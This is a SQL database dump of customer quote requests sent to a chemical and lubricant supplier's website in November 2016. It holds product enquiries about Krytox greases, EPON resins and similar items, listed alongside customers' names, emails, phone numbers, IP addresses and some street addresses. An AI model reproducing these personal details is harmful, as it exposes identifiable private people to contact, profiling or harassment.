INSERT INTO `wp_enquiry_detail_new` VALUES (210, 'Bunmi Cyprian', 'bunmicy@gmail.com', 'pls send a quote for PGPL 201\nQuantity 4', '(240) 280-6124', 'GPL 201 ', '73.173.64.66', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"769";s:5:"title";s:7:"GPL 201";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_117518518.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-14 04:43:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (211, 'Nathalie Malinov', 'nathalie.malinov@aeroservicesltd.com', 'Dear Team, \n\nCould you please kindly quote this item for me? \nShelf life should be almost maximum and quantity 6. Thank you. :)', '', 'Urgent RFQ', '141.170.11.172', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"910";s:5:"title";s:12:"EPON™ 815C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-815C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-14 10:32:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (212, 'Claudel Nestor', 'claudelnestor@thekanservices.com', 'Hello,\nI would like to get a price quote for the item above a total of 4   1kg jar Grease, Also please include lead time , Thank You', '(267) 909-9686', 'PRICE QUOTE NEEDED ', '76.98.1.183', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"769";s:5:"title";s:7:"GPL 201";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_117518518.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-14 16:53:30', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (213, 'Zhesen Tan', 'zhesen.tan@utah.edu', 'Hi there, \n\nI\'m a chemistry graduate student at the University of Utah. I\'d like to place an order for Krytox 157 FSH. Can you please send me a quotation of what\'s available (different sizes of bottle) with the corresponding prices? \n\nAnd does your company still sell HFE-7500 from 3M Novec? If so, I\'d like a quotation for that as well.\n\n\nThanks', '', 'Quotation for Krytox 157 FSH', '155.99.191.78', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"956";s:5:"title";s:7:"157 FSH";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-14 22:11:30', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (214, 'Bryden Smallwood', 'brydensmallwood@gmail.com', 'Hi,\n\nMy name is Bryden and I\'m a Master\'s student with the University of Toronto. I\'m looking for Krytox lubricant for an O-ring used on a heated filter that comes off of my engine exhaust. The filter is heated to  191 degrees Celsius, but can get closer to 320 degrees Celsius when the engine is at full load. I was wondering what the best Krytox lubricant would be for this situation and if I could get a quote for that lubricant?\n\nThanks,\nBryden', '(343) 363-3525', 'Krytox Lubricant for O-ring', '128.100.49.193', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"672";s:5:"title";s:6:"XHT-AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_340828220.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-14 22:24:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (215, 'Todd Warakomski', 'twarakomski@sbna-inc.com', 'I would like a sample of Epikure W, 1 quart will work. If needed I will purchase. \nAddress:\nTodd Warakomski\n5000 Packard Road \nNiagara Falls, NY 14304\n\nThanks,\nTodd', '(716) 286-0145', 'Epikure W sample 1 quart', '10.227.29.57', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-15 15:21:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (216, 'Stephanie K', 'Kreceptionist@gfschemicals.com', 'Krytox GPL-205\nQty 1-200\nQty 201-400\nQty 401-600\n\nGFS Chemicals.com', '', 'Quote please', '70.61.245.2', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-15 15:50:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (217, 'Stephen prosser', 'sprosser@crownpackaging.com', 'Krytox GPL226FG Grease - 28oz Cartridge (10/Box) - Box quantity', '(604) 241-3262', 'Price Quotation', '207.194.62.210', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"850";s:5:"title";s:7:"GPL 226";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_92739160.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-15 15:52:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (218, 'Cameron Spicer', 'SpicerC@Battelle.ord', 'Request quote for Epon 828', '(614) 424-6154', 'Request quote for Epon 828', '131.167.254.132', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-15 18:34:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (219, 'David Chun', 'dyoungc91@gmail.com', 'Hello,\n\nI\'m interested in purchasing GPL 103 oil and GPL 205 grease in small quantities.\nPlease provide a quote for 103 oil and 205 grease in 0.5 oz and 1oz quantities.\n\nThank you,\nDavid', '(845) 596-6014', 'GPL 103 quote', '208.167.254.204', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"438";s:5:"title";s:7:"GPL 103";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease3.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-15 21:29:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (220, 'Blong Yang', 'blong.yang@intel.com', 'I need price quote on your Connector Lubricant MS-381HM 8oz.  Thank you.', '(916) 802-7560', 'Connector Lubricant MS-381HM', '134.134.139.83', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1670";s:5:"title";s:7:"MS-381H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-15 21:44:40', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (221, 'oscar ramales', 'aeroinproducts02@gmail.com', '\nPlease quote 24 gallons of EPON 815C', '', '', '189.242.187.27', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"910";s:5:"title";s:12:"EPON™ 815C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-815C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-15 22:54:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (222, 'Eddy Ye', 'Eddyecn@gmail.com', 'I need to buy 5pcs of MS-907, I am living at 16026 80A Ave, Surrey, BC, Canada. Can you please give me a price to my address? Thanks!', '(778) 558-9790', 'MS-907', '184.65.176.100', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-16 00:16:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (223, 'Arneal', 'arneal@wassamgroup.com', 'Dear Sales,\n\nMay we request for your kind quote below item.\n30 pcs = Krytox Grease GPL205.\n\nThanks,\nArneal', '+966 53 664 2942', 'GPL205', '2.91.146.119', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-16 09:05:36', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (224, 'Carl Paul', 'doctorkpmix@gmail.com', 'I am interested purchasing ms-122ad', '(718) 528-4638', 'purchase', '37.48.80.202', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-16 14:24:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (225, 'Sean Vowell', 'sean.vowell@ge.com', 'This is for Unison Industries in Jacksonville, FL, part of GE Aviation. Please send me a quote for 1 container. Also, please let me know if there are any quantity discounts available.', '(904) 739-4470', 'Quote', '165.156.24.5', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1726";s:5:"title";s:24:"Antistatic Quik-Freeze®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze-anti-static.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-16 18:01:51', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (226, 'Paul Eastwood', 'paul.eastwood@rogerselectromatics.com', 'Hello,\n\nI\'m looking for quotes regarding the Krytox XHT-BDZ.  Specifically looking for prices on a standard size cartridge for a grease gun. \nThank you,\n\nPaul T.  Eastwood III', '(260) 336-6039', 'Krytox XHT-BDZ', '67.237.45.144', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"696";s:5:"title";s:7:"XHT-BDZ";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_68906731.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-16 21:37:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (227, 'vivian', 'vmenadier@ptr1.net', 'Hello Please provide an Invocie in roder to procee with the payment \nThank you \n\nVivian ', '(305) 234-8844', 'MS-242N', '207.242.109.218', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1719";s:5:"title";s:21:"Quik-Freeze® MS-242N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-16 21:45:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (228, 'Kevin', 'kbodnar@socalmodelcars.com', 'I would like to order Releasys 82. Can you let me know how much it will cost and if I can order it directly from the site?\nThank you,\nKevin', '(949) 547-6731', 'Price/Order', '98.189.136.151', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"400";s:5:"title";s:21:"ReleaSys 82 (Aerosol)";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:84:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Windmill-ReleaSys82.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-16 22:25:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (229, 'Ben Berrios', 'ben@varsal.com', 'Hello managers,\nPlease provide COA Specs, pricing and availability for drums or pails from 100kg -1000kg quantities.\nThanks,\nBen Berrios/VARSAL LLC', '(215) 957-5880', 'pricing per kg for 1000kg requirement', '108.36.119.122', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1187";s:5:"title";s:15:"EPIKURE™ 3245";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3245.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-17 14:54:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (230, 'Sylvain Bedard', 'sylvain.bedard@humber.ca', 'Hi,\n\nI\'m a technician from Humber College in Toronto, Ontario, Canada.  I\'m looking to purchase the Contact Re-Nu &amp; Lube MS-538.  Is there a store in Canada that can sell me this product?  I need 2 cans.  \n\nThanks,\n\nSylvain', '(647) 885-9367', 'looking to purchase MS-538', '142.214.37.35', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1836";s:5:"title";s:7:"MS-538N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:95:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/electrical-contact-lubricant-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-17 17:20:03', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (231, 'David Weurding', 'david.weurding@gentex.com', 'I would like to receive a sample of MS-122AD', '(616) 772-1800', 'Release agent for polyurethane', '204.19.223.246', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-17 17:20:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (232, 'MANUEL RUBIO', 'MRUBIO@AVENIRAVIATION.COM', 'PLEASE PROVIDE PRICE AND AVAILABILITY ON PART NUMBER MS-124H MINIMUM ORDER', '(786) 272-7020', 'QUOTE', '23.126.141.105', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1673";s:5:"title";s:7:"MS-124H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:93:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant-tribosys.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-17 17:58:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (233, 'Homer Ayana', 'homer.f.ayana@navy.mil', 'Please provide a quote for MS-122AV and SDS sheets.  Thank you.\n', '', 'Quote for MS-122AV', '128.49.77.16', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"182";s:5:"title";s:8:"MS-122AV";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Automotive.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-17 18:30:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (234, 'Anaële Pin', 'anaele.pin@sherbrooke.ca', 'Good morning,\n\nAccording to my master research at Université de Sherbrooke, I\'d like to test some of your products in my experimentation.\n\nI\'d like to know if it is possible to have some samples of Krytox 157 FSL. I need a few millimeters (15 ml maximum).\n\nThank you for your attention.', '', 'Krytox 157 FSL sample', '132.210.195.85', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-17 20:34:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (235, 'Stacey Bilger', 'bilger@youngtron.com', 'Request for quote and delivery lead time.', '(215) 822-7866', 'Request for quote', '50.251.35.126', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"735";s:5:"title";s:7:"MS-470C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-17 21:01:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (236, 'Tabatha Burke', 'burketn@ornl.gov', 'I would like to request a quote for 4 of the MS-122AD.  We would require a C of C with this order. ', '(865) 576-3564', 'MS-122AD', '128.219.49.14', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-18 14:14:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (237, 'Igor ILYIN', 'ilyin.1@osu.edu', 'Hello\nPlease send price for different packaging of MS-114C.\nDo you have trial sample?\nIf Yes, Please send one \nARC OSU\nAttn Igor ILYIN\n2300 West Case Rd.\nColumbus OH 43235\nThank You in advance.\nIgor ILYIN Ph.D.', '(614) 292-5058', 'MS-114C', '140.254.14.133', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"623";s:5:"title";s:7:"MS-114C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-114C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-18 17:25:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (238, 'ed van vliet', 'sales@vel-1.com', 'we need a conformal stripper to remove from boards for oem board assembly problems. must be able to accept re-conformal after repairs.\nEd', '(905) 830-1409', 'arcylic &amp; siluicone conformal coating striper', '99.254.202.250', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"623";s:5:"title";s:7:"MS-114C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-114C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-18 23:59:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (239, 'Leon ', 'Specialride20@yahoo.com', 'Can I purchase MS-260 for private use ?', '(347) 755-2752', 'Ms260', '208.54.37.161', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-19 10:42:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (240, 'Dan Hogan', 'dhoganfamily1@gmail.com', 'looking for bearing grease or oil for a live center for a wood lathe', '(513) 941-8846', 'bearing grease or oil ', '65.27.19.209', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1014";s:5:"title";s:6:"XP 2A4";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-bearing-grease6.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-19 16:30:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (241, 'Ron Treat', 'rtreat49@gmail.com', 'We need to re stock our supply to clean switches and controls on our Solid State Logic recording console. Minimum quantity requirement ?', '(417) 598-0094', 'cost of Contact Re-Nu &amp; Lube MS-738', '70.182.85.111', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1292";s:5:"title";s:15:"Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/contact-cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-21 16:09:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (242, 'JACQUELINE DOS REIS', 'CedaTrade@gmail.com', 'Could you please quote 200 Kg of Epon Resin 58034. Please include shipping costs to Miami, Fl.\n\nThanks', '(954) 512-9178', 'Quote', '24.233.175.20', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"994";s:5:"title";s:13:"EPON™ 58034";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIN-58034.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-21 17:29:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (243, 'Guido Vallerotto', 'guido.vallerotto@ies-def.upm.es', 'To whom it may concern,\nI am a Ph.D. student at Solar Energy Institute - Madrid Technical University. We are interested in buying the PTFE mould relase agent MS-122AV. I kindly ask you a quote for the minimum amount of product you can sell. Is it possible to send the product to Spain?\nThank you very much for your attention.\nRegards,\nGuido Vallerotto', '+34 662 01 23 78', 'PTFE Mould Relase', '138.100.16.178', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"182";s:5:"title";s:8:"MS-122AV";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Automotive.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-21 17:30:15', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (244, 'Guido Vallerotto', 'guido.vallerotto@ies-def.upm.es', 'To whom it may concern,\nI am a Ph.D. student at Solar Energy Institute - Madrid Technical University. We are interested in buying the PTFE mould relase agent MS-122SE. I kindly ask you a quote for the minimum amount of product you can sell. Is it possible to send the product to Spain?\nThank you very much for your attention.\nRegards,\nGuido Vallerotto', '+34 662 01 23 78', 'MS-122SE Quote', '138.100.16.178', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"302";s:5:"title";s:8:"MS-122SE";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:83:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-122SE-Aerospace.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-21 17:31:00', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (245, 'jseger', 'jseger@dymax.com', 'cost/quantities of MS122XD', '', 'MS-122XD', '12.197.156.189', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1681";s:5:"title";s:8:"MS-122XD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122xd-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-21 19:25:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (246, 'Cristian Umana', 'cumana@tesla.com', 'Hello, I would like to request a quote for solder remover.  ', '(650) 430-8065', 'Needed for JBlack', '209.133.79.5', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-21 20:34:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (247, 'Thomas Wilhelm', 'wilhelm-t@slv-duisburg.de', 'Is there an european import for this product? I need two packs of this adhesive.\n\nBest regards\nThomas Wilhelm', '', 'Inquiry', '195.37.113.6', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-11-22 11:45:58', '', NULL, '', '', '', NULL, '', ''); 
